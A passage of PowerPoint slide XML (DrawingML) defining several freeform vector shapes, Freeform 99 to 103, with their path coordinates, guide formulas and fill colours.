                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 42"/>
                  <a:gd name="T16" fmla="*/ 0 h 14"/>
                  <a:gd name="T17" fmla="*/ 42 w 42"/>
                  <a:gd name="T18" fmla="*/ 14 h 14"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="42" h="14">
                    <a:moveTo>
                      <a:pt x="42" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10692" name="Freeform 99"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1284" y="2680"/>
                <a:ext cx="28" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 28"/>
                  <a:gd name="T1" fmla="*/ 4 h 10"/>
                  <a:gd name="T2" fmla="*/ 0 w 28"/>
                  <a:gd name="T3" fmla="*/ 0 h 10"/>
                  <a:gd name="T4" fmla="*/ 0 w 28"/>
                  <a:gd name="T5" fmla="*/ 4 h 10"/>
                  <a:gd name="T6" fmla="*/ 27 w 28"/>
                  <a:gd name="T7" fmla="*/ 10 h 10"/>
                  <a:gd name="T8" fmla="*/ 28 w 28"/>
                  <a:gd name="T9" fmla="*/ 4 h 10"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 28"/>
                  <a:gd name="T16" fmla="*/ 0 h 10"/>
                  <a:gd name="T17" fmla="*/ 28 w 28"/>
                  <a:gd name="T18" fmla="*/ 10 h 10"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="28" h="10">
                    <a:moveTo>
                      <a:pt x="28" y="4"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10693" name="Freeform 100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1216" y="2689"/>
                <a:ext cx="162" cy="55"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 162"/>
                  <a:gd name="T1" fmla="*/ 16 h 55"/>
                  <a:gd name="T2" fmla="*/ 0 w 162"/>
                  <a:gd name="T3" fmla="*/ 16 h 55"/>
                  <a:gd name="T4" fmla="*/ 1 w 162"/>
                  <a:gd name="T5" fmla="*/ 16 h 55"/>
                  <a:gd name="T6" fmla="*/ 2 w 162"/>
                  <a:gd name="T7" fmla="*/ 16 h 55"/>
                  <a:gd name="T8" fmla="*/ 4 w 162"/>
                  <a:gd name="T9" fmla="*/ 15 h 55"/>
                  <a:gd name="T10" fmla="*/ 7 w 162"/>
                  <a:gd name="T11" fmla="*/ 15 h 55"/>
                  <a:gd name="T12" fmla="*/ 10 w 162"/>
                  <a:gd name="T13" fmla="*/ 15 h 55"/>
                  <a:gd name="T14" fmla="*/ 14 w 162"/>
                  <a:gd name="T15" fmla="*/ 14 h 55"/>
                  <a:gd name="T16" fmla="*/ 17 w 162"/>
                  <a:gd name="T17" fmla="*/ 13 h 55"/>
                  <a:gd name="T18" fmla="*/ 21 w 162"/>
                  <a:gd name="T19" fmla="*/ 12 h 55"/>
                  <a:gd name="T20" fmla="*/ 24 w 162"/>
                  <a:gd name="T21" fmla="*/ 11 h 55"/>
                  <a:gd name="T22" fmla="*/ 28 w 162"/>
                  <a:gd name="T23" fmla="*/ 9 h 55"/>
                  <a:gd name="T24" fmla="*/ 31 w 162"/>
                  <a:gd name="T25" fmla="*/ 8 h 55"/>
                  <a:gd name="T26" fmla="*/ 35 w 162"/>
                  <a:gd name="T27" fmla="*/ 6 h 55"/>
                  <a:gd name="T28" fmla="*/ 37 w 162"/>
                  <a:gd name="T29" fmla="*/ 5 h 55"/>
                  <a:gd name="T30" fmla="*/ 40 w 162"/>
                  <a:gd name="T31" fmla="*/ 2 h 55"/>
                  <a:gd name="T32" fmla="*/ 43 w 162"/>
                  <a:gd name="T33" fmla="*/ 0 h 55"/>
                  <a:gd name="T34" fmla="*/ 162 w 162"/>
                  <a:gd name="T35" fmla="*/ 28 h 55"/>
                  <a:gd name="T36" fmla="*/ 162 w 162"/>
                  <a:gd name="T37" fmla="*/ 28 h 55"/>
                  <a:gd name="T38" fmla="*/ 161 w 162"/>
                  <a:gd name="T39" fmla="*/ 29 h 55"/>
                  <a:gd name="T40" fmla="*/ 159 w 162"/>
                  <a:gd name="T41" fmla="*/ 30 h 55"/>
                  <a:gd name="T42" fmla="*/ 158 w 162"/>
                  <a:gd name="T43" fmla="*/ 32 h 55"/>
                  <a:gd name="T44" fmla="*/ 157 w 162"/>
                  <a:gd name="T45" fmla="*/ 33 h 55"/>
                  <a:gd name="T46" fmla="*/ 155 w 162"/>
                  <a:gd name="T47" fmla="*/ 35 h 55"/>
                  <a:gd name="T48" fmla="*/ 152 w 162"/>
                  <a:gd name="T49" fmla="*/ 36 h 55"/>
                  <a:gd name="T50" fmla="*/ 150 w 162"/>
                  <a:gd name="T51" fmla="*/ 39 h 55"/>
                  <a:gd name="T52" fmla="*/ 147 w 162"/>
                  <a:gd name="T53" fmla="*/ 41 h 55"/>
                  <a:gd name="T54" fmla="*/ 144 w 162"/>
                  <a:gd name="T55" fmla="*/ 43 h 55"/>
                  <a:gd name="T56" fmla="*/ 141 w 162"/>
                  <a:gd name="T57" fmla="*/ 46 h 55"/>
                  <a:gd name="T58" fmla="*/ 137 w 162"/>
                  <a:gd name="T59" fmla="*/ 48 h 55"/>
                  <a:gd name="T60" fmla="*/ 135 w 162"/>
                  <a:gd name="T61" fmla="*/ 50 h 55"/>
                  <a:gd name="T62" fmla="*/ 131 w 162"/>
                  <a:gd name="T63" fmla="*/ 51 h 55"/>
                  <a:gd name="T64" fmla="*/ 128 w 162"/>
                  <a:gd name="T65" fmla="*/ 53 h 55"/>
                  <a:gd name="T66" fmla="*/ 126 w 162"/>
                  <a:gd name="T67" fmla="*/ 55 h 55"/>
                  <a:gd name="T68" fmla="*/ 0 w 162"/>
                  <a:gd name="T69" fmla="*/ 16 h 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2"/>
                  <a:gd name="T106" fmla="*/ 0 h 55"/>
                  <a:gd name="T107" fmla="*/ 162 w 162"/>
                  <a:gd name="T108" fmla="*/ 55 h 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2" h="55">
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="99D8D8"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10694" name="Freeform 101"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1378" y="2683"/>
                <a:ext cx="57" cy="26"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 6 w 57"/>
                  <a:gd name="T1" fmla="*/ 26 h 26"/>
                  <a:gd name="T2" fmla="*/ 57 w 57"/>
                  <a:gd name="T3" fmla="*/ 11 h 26"/>
                  <a:gd name="T4" fmla="*/ 25 w 57"/>
                  <a:gd name="T5" fmla="*/ 0 h 26"/>
                  <a:gd name="T6" fmla="*/ 0 w 57"/>
                  <a:gd name="T7" fmla="*/ 4 h 26"/>
                  <a:gd name="T8" fmla="*/ 0 w 57"/>
                  <a:gd name="T9" fmla="*/ 25 h 26"/>
                  <a:gd name="T10" fmla="*/ 6 w 57"/>
                  <a:gd name="T11" fmla="*/ 26 h 26"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T18" fmla="*/ 0 w 57"/>
                  <a:gd name="T19" fmla="*/ 0 h 26"/>
                  <a:gd name="T20" fmla="*/ 57 w 5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7" h="26">
                    <a:moveTo>
                      <a:pt x="6" y="26"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="57" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="001999"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10695" name="Freeform 102"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1227" y="2573"/>
                <a:ext cx="32" cy="123"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 32 w 32"/>
                  <a:gd name="T1" fmla="*/ 3 h 123"/>
                  <a:gd name="T2" fmla="*/ 32 w 32"/>
                  <a:gd name="T3" fmla="*/ 3 h 123"/>
                  <a:gd name="T4" fmla="*/ 31 w 32"/>
                  <a:gd name="T5" fmla="*/ 3 h 123"/>
                  <a:gd name="T6" fmla="*/ 31 w 32"/>
                  <a:gd name="T7" fmla="*/ 3 h 123"/>
                  <a:gd name="T8" fmla="*/ 29 w 32"/>
                  <a:gd name="T9" fmla="*/ 2 h 123"/>
                  <a:gd name="T10" fmla="*/ 27 w 32"/>
                  <a:gd name="T11" fmla="*/ 2 h 123"/>
                  <a:gd name="T12" fmla="*/ 26 w 32"/>
                  <a:gd name="T13" fmla="*/ 2 h 123"/>
                  <a:gd name="T14" fmla="*/ 24 w 32"/>
                  <a:gd name="T15" fmla="*/ 0 h 123"/>
                  <a:gd name="T16" fmla="*/ 22 w 32"/>
                  <a:gd name="T17" fmla="*/ 0 h 123"/>
                  <a:gd name="T18" fmla="*/ 20 w 32"/>
                  <a:gd name="T19" fmla="*/ 0 h 123"/>
                  <a:gd name="T20" fmla="*/ 18 w 32"/>
                  <a:gd name="T21" fmla="*/ 0 h 123"/>
                  <a:gd name="T22" fmla="*/ 14 w 32"/>
                  <a:gd name="T23" fmla="*/ 0 h 123"/>
                  <a:gd name="T24" fmla="*/ 12 w 32"/>
                  <a:gd name="T25" fmla="*/ 0 h 123"/>
                  <a:gd name="T26" fmla="*/ 10 w 32"/>
                  <a:gd name="T27" fmla="*/ 2 h 123"/>
                  <a:gd name="T28" fmla="*/ 6 w 32"/>
                  <a:gd name="T29" fmla="*/ 3 h 123"/>
                  <a:gd name="T30" fmla="*/ 4 w 32"/>
                  <a:gd name="T31" fmla="*/ 4 h 123"/>
                  <a:gd name="T32" fmla="*/ 0 w 32"/>
                  <a:gd name="T33" fmla="*/ 6 h 123"/>
                  <a:gd name="T34" fmla="*/ 0 w 32"/>
                  <a:gd name="T35" fmla="*/ 123 h 123"/>
                  <a:gd name="T36" fmla="*/ 1 w 32"/>
                  <a:gd name="T37" fmla="*/ 123 h 123"/>
                  <a:gd name="T38" fmla="*/ 1 w 32"/>
                  <a:gd name="T39" fmla="*/ 123 h 123"/>
                  <a:gd name="T40" fmla="*/ 3 w 32"/>
                  <a:gd name="T41" fmla="*/ 123 h 123"/>
                  <a:gd name="T42" fmla="*/ 4 w 32"/>
                  <a:gd name="T43" fmla="*/ 123 h 123"/>
                  <a:gd name="T44" fmla="*/ 5 w 32"/>
                  <a:gd name="T45" fmla="*/ 123 h 123"/>
                  <a:gd name="T46" fmla="*/ 7 w 32"/>
                  <a:gd name="T47" fmla="*/ 122 h 123"/>
                  <a:gd name="T48" fmla="*/ 8 w 32"/>
                  <a:gd name="T49" fmla="*/ 122 h 123"/>
                  <a:gd name="T50" fmla="*/ 11 w 32"/>
                  <a:gd name="T51" fmla="*/ 122 h 123"/>
                  <a:gd name="T52" fmla="*/ 13 w 32"/>
                  <a:gd name="T53" fmla="*/ 121 h 123"/>
                  <a:gd name="T54" fmla="*/ 15 w 32"/>
                  <a:gd name="T55" fmla="*/ 120 h 123"/>
                  <a:gd name="T56" fmla="*/ 18 w 32"/>
                  <a:gd name="T57" fmla="*/ 120 h 123"/>
                  <a:gd name="T58" fmla="*/ 21 w 32"/>
                  <a:gd name="T59" fmla="*/ 118 h 123"/>
                  <a:gd name="T60" fmla="*/ 24 w 32"/>
                  <a:gd name="T61" fmla="*/ 116 h 123"/>
                  <a:gd name="T62" fmla="*/ 26 w 32"/>
                  <a:gd name="T63" fmla="*/ 115 h 123"/>
                  <a:gd name="T64" fmla="*/ 29 w 32"/>
                  <a:gd name="T65" fmla="*/ 114 h 123"/>
                  <a:gd name="T66" fmla="*/ 32 w 32"/>
                  <a:gd name="T67" fmla="*/ 111 h 123"/>
                  <a:gd name="T68" fmla="*/ 32 w 32"/>
                  <a:gd name="T69" fmla="*/ 3 h 12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
                  <a:gd name="T106" fmla="*/ 0 h 123"/>
                  <a:gd name="T107" fmla="*/ 32 w 32"/>
                  <a:gd name="T108" fmla="*/ 123 h 12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 h="123">
                    <a:moveTo>
                      <a:pt x="32" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="32" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="3"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="7FBFBF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10696" name="Freeform 103"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1228" y="2575"/>
                <a:ext cx="27" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 27"/>
                  <a:gd name="T1" fmla="*/ 2 h 104"/>
                  <a:gd name="T2" fmla="*/ 27 w 27"/>
                  <a:gd name="T3" fmla="*/ 2 h 104"/>
                  <a:gd name="T4" fmla="*/ 26 w 27"/>
                  <a:gd name="T5" fmla="*/ 2 h 104"/>
                  <a:gd name="T6" fmla="*/ 26 w 27"/>
                  <a:gd name="T7" fmla="*/ 1 h 104"/>
                  <a:gd name="T8" fmla="*/ 25 w 27"/>
                  <a:gd name="T9" fmla="*/ 1 h 104"/>
                  <a:gd name="T10" fmla="*/ 24 w 27"/>
                  <a:gd name="T11" fmla="*/ 1 h 104"/>
                  <a:gd name="T12" fmla="*/ 23 w 27"/>
                  <a:gd name="T13" fmla="*/ 0 h 104"/>
                  <a:gd name="T14" fmla="*/ 20 w 27"/>
                  <a:gd name="T15" fmla="*/ 0 h 104"/>
                  <a:gd name="T16" fmla="*/ 19 w 27"/>
                  <a:gd name="T17" fmla="*/ 0 h 104"/>
                  <a:gd name="T18" fmla="*/ 17 w 27"/>
                  <a:gd name="T19" fmla="*/ 0 h 104"/>
                  <a:gd name="T20" fmla="*/ 14 w 27"/>
                  <a:gd name="T21" fmla="*/ 0 h 104"/>
                  <a:gd name="T22" fmla="*/ 12 w 27"/>
                  <a:gd name="T23" fmla="*/ 0 h 104"/>
                  <a:gd name="T24" fmla="*/ 10 w 27"/>
                  <a:gd name="T25" fmla="*/ 0 h 104"/>
                  <a:gd name="T26" fmla="*/ 9 w 27"/>
                  <a:gd name="T27" fmla="*/ 1 h 104"/>
                  <a:gd name="T28" fmla="*/ 5 w 27"/>
                  <a:gd name="T29" fmla="*/ 2 h 104"/>
                  <a:gd name="T30" fmla="*/ 3 w 27"/>
                  <a:gd name="T31" fmla="*/ 3 h 104"/>
                  <a:gd name="T32" fmla="*/ 0 w 27"/>
                  <a:gd name="T33" fmla="*/ 4 h 104"/>
                  <a:gd name="T34" fmla="*/ 0 w 27"/>
                  <a:gd name="T35" fmla="*/ 104 h 104"/>
                  <a:gd name="T36" fmla="*/ 0 w 27"/>
                  <a:gd name="T37" fmla="*/ 104 h 104"/>
                  <a:gd name="T38" fmla="*/ 2 w 27"/>
                  <a:gd name="T39" fmla="*/ 104 h 104"/>
                  <a:gd name="T40" fmla="*/ 2 w 27"/>
                  <a:gd name="T41" fmla="*/ 102 h 104"/>
                  <a:gd name="T42" fmla="*/ 3 w 27"/>
                  <a:gd name="T43" fmla="*/ 102 h 104"/>
                  <a:gd name="T44" fmla="*/ 4 w 27"/>
                  <a:gd name="T45" fmla="*/ 102 h 104"/>
                  <a:gd name="T46" fmla="*/ 6 w 27"/>
                  <a:gd name="T47" fmla="*/ 102 h 104"/>
                  <a:gd name="T48" fmla="*/ 7 w 27"/>
                  <a:gd name="T49" fmla="*/ 102 h 104"/>
                  <a:gd name="T50" fmla="*/ 10 w 27"/>
                  <a:gd name="T51" fmla="*/ 101 h 104"/>
                  <a:gd name="T52" fmla="*/ 11 w 27"/>
                  <a:gd name="T53" fmla="*/ 101 h 104"/>
                  <a:gd name="T54" fmla="*/ 13 w 27"/>
                  <a:gd name="T55" fmla="*/ 100 h 104"/>
                  <a:gd name="T56" fmla="*/ 16 w 27"/>
                  <a:gd name="T57" fmla="*/ 99 h 104"/>
                  <a:gd name="T58" fmla="*/ 18 w 27"/>
                  <a:gd name="T59" fmla="*/ 99 h 104"/>
                  <a:gd name="T60" fmla="*/ 20 w 27"/>
                  <a:gd name="T61" fmla="*/ 98 h 104"/>
                  <a:gd name="T62" fmla="*/ 23 w 27"/>
                  <a:gd name="T63" fmla="*/ 96 h 104"/>
                  <a:gd name="T64" fmla="*/ 25 w 27"/>
                  <a:gd name="T65" fmla="*/ 94 h 104"/>
                  <a:gd name="T66" fmla="*/ 27 w 27"/>
                  <a:gd name="T67" fmla="*/ 93 h 104"/>
                  <a:gd name="T68" fmla="*/ 27 w 27"/>
                  <a:gd name="T69" fmla="*/ 2 h 1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
                  <a:gd name="T106" fmla="*/ 0 h 104"/>
                  <a:gd name="T107" fmla="*/ 27 w 27"/>
                  <a:gd name="T108" fmla="*/ 104 h 10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 h="104">
                    <a:moveTo>
                      <a:pt x="27" y="2"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
